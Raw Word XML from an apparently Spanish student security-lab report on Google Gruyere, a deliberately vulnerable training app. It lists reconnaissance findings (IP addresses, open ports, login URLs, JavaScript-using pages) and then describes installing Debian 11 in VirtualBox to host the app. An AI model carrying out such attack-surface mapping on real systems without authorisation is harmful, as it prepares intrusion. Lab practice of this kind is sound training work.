              <w:p w14:paraId="155697D7" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00556339" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.201.21</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="2CF79860" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00556339" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.201.22</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="7FB05DD9" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00556339" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.201.23</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="5298153B" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00556339" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.201.24</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="4C5A1ECD" w14:textId="77777777" w:rsidR="00556339" w:rsidRPr="00556339" w:rsidRDefault="00556339" w:rsidP="00556339">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.201.25</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="69663488" w14:textId="77777777" w:rsidR="00556339" w:rsidRPr="00556339" w:rsidRDefault="00556339" w:rsidP="00556339">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.201.26</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="03B6CCC1" w14:textId="77777777" w:rsidR="00556339" w:rsidRPr="00556339" w:rsidRDefault="00556339" w:rsidP="00556339">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.201.27</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="05D27317" w14:textId="77777777" w:rsidR="008C192F" w:rsidRDefault="008C192F"/>
            </w:tc>
          </w:tr>
        </w:tbl>
        <w:p w14:paraId="219B372A" w14:textId="5A9FF862" w:rsidR="003077BC" w:rsidRDefault="003077BC"/>
        <w:tbl>
          <w:tblPr>
            <w:tblStyle w:val="Tablaconcuadrcula"/>
            <w:tblW w:w="0" w:type="auto"/>
            <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
          </w:tblPr>
          <w:tblGrid>
            <w:gridCol w:w="4247"/>
            <w:gridCol w:w="4247"/>
          </w:tblGrid>
          <w:tr w:rsidR="00556339" w14:paraId="62B92509" w14:textId="77777777" w:rsidTr="00556339">
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4247" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="06CF969E" w14:textId="3D32FE79" w:rsidR="00556339" w:rsidRDefault="00556339">
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                  <w:t>Puertos TCP abiertos</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4247" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="64D1E132" w14:textId="543874D3" w:rsidR="00556339" w:rsidRDefault="00556339">
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                  <w:t>Ficheros interesantes</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00556339" w14:paraId="79D17815" w14:textId="77777777" w:rsidTr="00556339">
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4247" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="5B774D5E" w14:textId="77777777" w:rsidR="00556339" w:rsidRPr="00556339" w:rsidRDefault="00556339" w:rsidP="00556339">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.201.20:443</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="6E96179B" w14:textId="77777777" w:rsidR="00556339" w:rsidRPr="00556339" w:rsidRDefault="00556339" w:rsidP="00556339">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.201.20:80</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="10D134FD" w14:textId="77777777" w:rsidR="00556339" w:rsidRPr="00556339" w:rsidRDefault="00556339" w:rsidP="00556339">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>216.58.212.116:443</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="1D45EC54" w14:textId="77777777" w:rsidR="00556339" w:rsidRPr="00556339" w:rsidRDefault="00556339" w:rsidP="00556339">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>216.58.212.116:80</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="04658ECE" w14:textId="77777777" w:rsidR="00556339" w:rsidRPr="00556339" w:rsidRDefault="00556339" w:rsidP="00556339">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>google-gruyere.appspot.com:443</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="0212B0D7" w14:textId="77777777" w:rsidR="00556339" w:rsidRPr="00556339" w:rsidRDefault="00556339" w:rsidP="00556339">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>mrs08s19-in-f20.1e100.net:443</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="463A6F39" w14:textId="77777777" w:rsidR="00556339" w:rsidRPr="00556339" w:rsidRDefault="00556339" w:rsidP="00556339">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>www.google-gruyere.appspot.com:443</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="73CEBD5B" w14:textId="77777777" w:rsidR="00556339" w:rsidRPr="00556339" w:rsidRDefault="00556339">
                <w:pPr>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4247" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="56F1BC26" w14:textId="77777777" w:rsidR="00556339" w:rsidRPr="00556339" w:rsidRDefault="00556339" w:rsidP="00556339">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>http://google-gruyere.appspot.com/gruyere-code.zip</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="5D434C42" w14:textId="77777777" w:rsidR="00556339" w:rsidRPr="00556339" w:rsidRDefault="00556339" w:rsidP="00556339">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
            </w:tc>
          </w:tr>
        </w:tbl>
        <w:p w14:paraId="4608B54C" w14:textId="6ED7BB44" w:rsidR="003077BC" w:rsidRDefault="003077BC"/>
        <w:tbl>
          <w:tblPr>
            <w:tblStyle w:val="Tablaconcuadrcula"/>
            <w:tblW w:w="0" w:type="auto"/>
            <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
          </w:tblPr>
          <w:tblGrid>
            <w:gridCol w:w="8494"/>
          </w:tblGrid>
          <w:tr w:rsidR="006F65EE" w14:paraId="6876D3DA" w14:textId="77777777" w:rsidTr="006F65EE">
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="8273" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="795A6AF2" w14:textId="2980434E" w:rsidR="006F65EE" w:rsidRDefault="006F65EE" w:rsidP="006F65EE">
                <w:pPr>
                  <w:jc w:val="center"/>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                  <w:t>URL contraseñas</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="006F65EE" w14:paraId="178376E1" w14:textId="77777777" w:rsidTr="006F65EE">
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="8273" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="5C7B69DA" w14:textId="77777777" w:rsidR="006F65EE" w:rsidRPr="00556339" w:rsidRDefault="006F65EE" w:rsidP="00556339">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>http://google-gruyere.appspot.com/341973498225144587203316926302118026940/login</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="6702EBCA" w14:textId="77777777" w:rsidR="006F65EE" w:rsidRPr="00556339" w:rsidRDefault="006F65EE">
                <w:pPr>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="2E2CA220" w14:textId="77777777" w:rsidR="006F65EE" w:rsidRPr="00556339" w:rsidRDefault="006F65EE" w:rsidP="00556339">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>http://google-gruyere.appspot.com/341973498225144587203316926302118026940/newaccount.gtl</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="63AEEF3B" w14:textId="77777777" w:rsidR="006F65EE" w:rsidRDefault="006F65EE"/>
              <w:p w14:paraId="31AA4A3B" w14:textId="528216BB" w:rsidR="006F65EE" w:rsidRDefault="006F65EE"/>
            </w:tc>
          </w:tr>
        </w:tbl>
        <w:p w14:paraId="00FE58A0" w14:textId="389AB08B" w:rsidR="003077BC" w:rsidRDefault="003077BC"/>
        <w:p w14:paraId="217383BD" w14:textId="6791B449" w:rsidR="003077BC" w:rsidRDefault="003077BC"/>
        <w:tbl>
          <w:tblPr>
            <w:tblStyle w:val="Tablaconcuadrcula"/>
            <w:tblW w:w="0" w:type="auto"/>
            <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
          </w:tblPr>
          <w:tblGrid>
            <w:gridCol w:w="8494"/>
          </w:tblGrid>
          <w:tr w:rsidR="006F65EE" w14:paraId="62F5A17D" w14:textId="77777777" w:rsidTr="006F65EE">
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="8494" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="135FF2E3" w14:textId="4282EF18" w:rsidR="006F65EE" w:rsidRDefault="006F65EE" w:rsidP="006F65EE">
                <w:pPr>
                  <w:jc w:val="center"/>
                </w:pPr>
                <w:r>
                  <w:t>URL que usan JavaScript</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="006F65EE" w14:paraId="5C2C0E5B" w14:textId="77777777" w:rsidTr="006F65EE">
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="8494" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="72504184" w14:textId="77777777" w:rsidR="006F65EE" w:rsidRPr="00627149" w:rsidRDefault="006F65EE" w:rsidP="006F65EE">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00627149">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>http://google-gruyere.appspot.com/341973498225144587203316926302118026940/</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="756CE372" w14:textId="77777777" w:rsidR="006F65EE" w:rsidRPr="00627149" w:rsidRDefault="006F65EE" w:rsidP="006F65EE">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00627149">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>http://google-gruyere.appspot.com/341973498225144587203316926302118026940/#</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="092C0090" w14:textId="77777777" w:rsidR="006F65EE" w:rsidRPr="00627149" w:rsidRDefault="006F65EE" w:rsidP="006F65EE">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00627149">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>http://google-gruyere.appspot.com/341973498225144587203316926302118026940/snippets.gtl?uid=Test123</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="6D5AC658" w14:textId="77777777" w:rsidR="006F65EE" w:rsidRPr="00627149" w:rsidRDefault="006F65EE" w:rsidP="006F65EE">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00627149">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>http://google-gruyere.appspot.com/341973498225144587203316926302118026940/snippets.gtl?uid=brie</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="42FEF34A" w14:textId="77777777" w:rsidR="00627149" w:rsidRPr="00627149" w:rsidRDefault="00627149" w:rsidP="00627149">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00627149">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>http://google-gruyere.appspot.com/341973498225144587203316926302118026940/snippets.gtl?uid=cheddar</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="720F9DF7" w14:textId="77777777" w:rsidR="006F65EE" w:rsidRDefault="006F65EE" w:rsidP="006F65EE">
                <w:pPr>
                  <w:jc w:val="center"/>
                </w:pPr>
              </w:p>
            </w:tc>
          </w:tr>
        </w:tbl>
        <w:p w14:paraId="521305A0" w14:textId="1268282C" w:rsidR="00352926" w:rsidRDefault="00000000"/>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2A5DBC80" w14:textId="52E51A2C" w:rsidR="00352926" w:rsidRDefault="00352926" w:rsidP="00352926">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc128034148"/>
      <w:r>
        <w:t>Instalación y configuración del contorno</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="3A29E446" w14:textId="7427268C" w:rsidR="00352926" w:rsidRDefault="00352926" w:rsidP="00352926"/>
    <w:p w14:paraId="1CFEAFE3" w14:textId="77777777" w:rsidR="00352926" w:rsidRPr="00352926" w:rsidRDefault="00352926" w:rsidP="00352926"/>
    <w:p w14:paraId="56403197" w14:textId="449D8BD9" w:rsidR="00F331D5" w:rsidRDefault="00B70D64">
      <w:r>
        <w:t xml:space="preserve">Voy a instalar la aplicación Google Gruyere en una máquina virtual Debian, en la versión : </w:t>
      </w:r>
      <w:r w:rsidR="005C4C17" w:rsidRPr="005C4C17">
        <w:t>debian-11.6.0-amd64</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF2E6DC" w14:textId="308F902A" w:rsidR="00C824E5" w:rsidRDefault="00C824E5"/>
    <w:p w14:paraId="0E9A7A0C" w14:textId="1C342F49" w:rsidR="00C824E5" w:rsidRDefault="00C824E5">
      <w:r>
        <w:t xml:space="preserve">Lo </w:t>
      </w:r>
      <w:r w:rsidR="003C0BE3">
        <w:t>primero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que tengo que hacer es descargar la </w:t>
      </w:r>
      <w:r w:rsidR="005639A5">
        <w:t>ISO</w:t>
      </w:r>
      <w:r w:rsidR="005C4C17">
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidR="005639A5">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="005C4C17">
        <w:t>ebian</w:t>
      </w:r>
      <w:r w:rsidR="005639A5">
        <w:t xml:space="preserve"> 11</w:t>
      </w:r>
      <w:r w:rsidR="00327068">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005C4C17">
        <w:t xml:space="preserve"> para poder </w:t>
      </w:r>
      <w:r w:rsidR="003C0BE3">
        <w:t>instalarla</w:t>
      </w:r>
      <w:r w:rsidR="005C4C17">
        <w:t xml:space="preserve"> en la máquina virtual, para esto la descargo de esta página:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ED3869" w14:textId="77777777" w:rsidR="005639A5" w:rsidRDefault="005639A5"/>
    <w:p w14:paraId="53F77370" w14:textId="4E5879A0" w:rsidR="005C4C17" w:rsidRDefault="005C4C17">
      <w:r w:rsidRPr="005C4C17">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3848B190" wp14:editId="6574D692">
            <wp:extent cx="5400040" cy="5242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5242560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="333EE01E" w14:textId="7BF5B65E" w:rsidR="005C4C17" w:rsidRDefault="005C4C17"/>
    <w:p w14:paraId="1C6227C4" w14:textId="078B7134" w:rsidR="005C4C17" w:rsidRDefault="005C4C17">
      <w:r>
        <w:t xml:space="preserve">Una vez que este descargado , procedo </w:t>
      </w:r>
      <w:r w:rsidR="005639A5">
        <w:t>a la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instalación del sistema operativo en </w:t>
      </w:r>
      <w:r w:rsidR="00D911EB">
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731F2EE5" w14:textId="0E56FACF" w:rsidR="005C4C17" w:rsidRDefault="005C4C17"/>
    <w:p w14:paraId="39E0952A" w14:textId="26BB7E2D" w:rsidR="005C4C17" w:rsidRDefault="005C4C17">
      <w:r w:rsidRPr="005C4C17">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C51F0AC" wp14:editId="7351DDEB">
            <wp:extent cx="5400040" cy="29902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90215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E45D4B" w14:textId="1F92E3D5" w:rsidR="005C4C17" w:rsidRDefault="005C4C17"/>
    <w:p w14:paraId="613B20DF" w14:textId="12D134F4" w:rsidR="005C4C17" w:rsidRDefault="005C4C17">
      <w:r w:rsidRPr="005C4C17">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DB87483" wp14:editId="30F3C4CA">
            <wp:extent cx="5400040" cy="29902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90215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE9379F" w14:textId="38E6B077" w:rsidR="005C4C17" w:rsidRDefault="005C4C17"/>
    <w:p w14:paraId="050C8A9E" w14:textId="6ACB4A2A" w:rsidR="005C4C17" w:rsidRDefault="005C4C17">
      <w:r w:rsidRPr="005C4C17">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CBCB48A" wp14:editId="03BFA937">
            <wp:extent cx="5400040" cy="29902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90215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E92D63" w14:textId="2CBA6ED0" w:rsidR="005C4C17" w:rsidRDefault="005C4C17"/>
    <w:p w14:paraId="0739F2DD" w14:textId="5526BED5" w:rsidR="005C4C17" w:rsidRDefault="005C4C17"/>
    <w:p w14:paraId="4A73D436" w14:textId="1EE994B5" w:rsidR="005C4C17" w:rsidRDefault="005C4C17">
      <w:r>
        <w:t>Ahora se procederá a la instalación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34181066" w14:textId="1A39F572" w:rsidR="005C4C17" w:rsidRDefault="005C4C17"/>
    <w:p w14:paraId="42DDD247" w14:textId="79525017" w:rsidR="005C4C17" w:rsidRDefault="005C4C17">
      <w:r w:rsidRPr="005C4C17">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4141D249" wp14:editId="546CDDD2">
            <wp:extent cx="5400040" cy="46431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4643120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F730DCB" w14:textId="53BAE6FD" w:rsidR="005C4C17" w:rsidRDefault="005C4C17">
      <w:r w:rsidRPr="005C4C17">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C44C354" wp14:editId="257C4490">
            <wp:extent cx="5400040" cy="40500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4050030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB7C97C" w14:textId="65D78135" w:rsidR="005C4C17" w:rsidRDefault="005C4C17"/>
    <w:p w14:paraId="5B2269EC" w14:textId="30133394" w:rsidR="005C4C17" w:rsidRDefault="005C4C17"/>
    <w:p w14:paraId="139B4B4B" w14:textId="1784BC07" w:rsidR="005C4C17" w:rsidRDefault="005C4C17">
      <w:r w:rsidRPr="005C4C17">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C7F0D50" wp14:editId="29922DE4">
            <wp:extent cx="5400040" cy="40500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4050030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7187BB06" w14:textId="625FB01A" w:rsidR="005C4C17" w:rsidRDefault="005C4C17">
      <w:r w:rsidRPr="005C4C17">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="072AC02D" wp14:editId="016387DC">
            <wp:extent cx="5400040" cy="405003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4050030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF3C398" w14:textId="504CB451" w:rsidR="005C4C17" w:rsidRDefault="005C4C17"/>
    <w:p w14:paraId="29AE62B1" w14:textId="2E108EDF" w:rsidR="005C4C17" w:rsidRDefault="005C4C17">
      <w:r w:rsidRPr="005C4C17">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5819B406" wp14:editId="3A216445">
            <wp:extent cx="5400040" cy="40500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4050030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
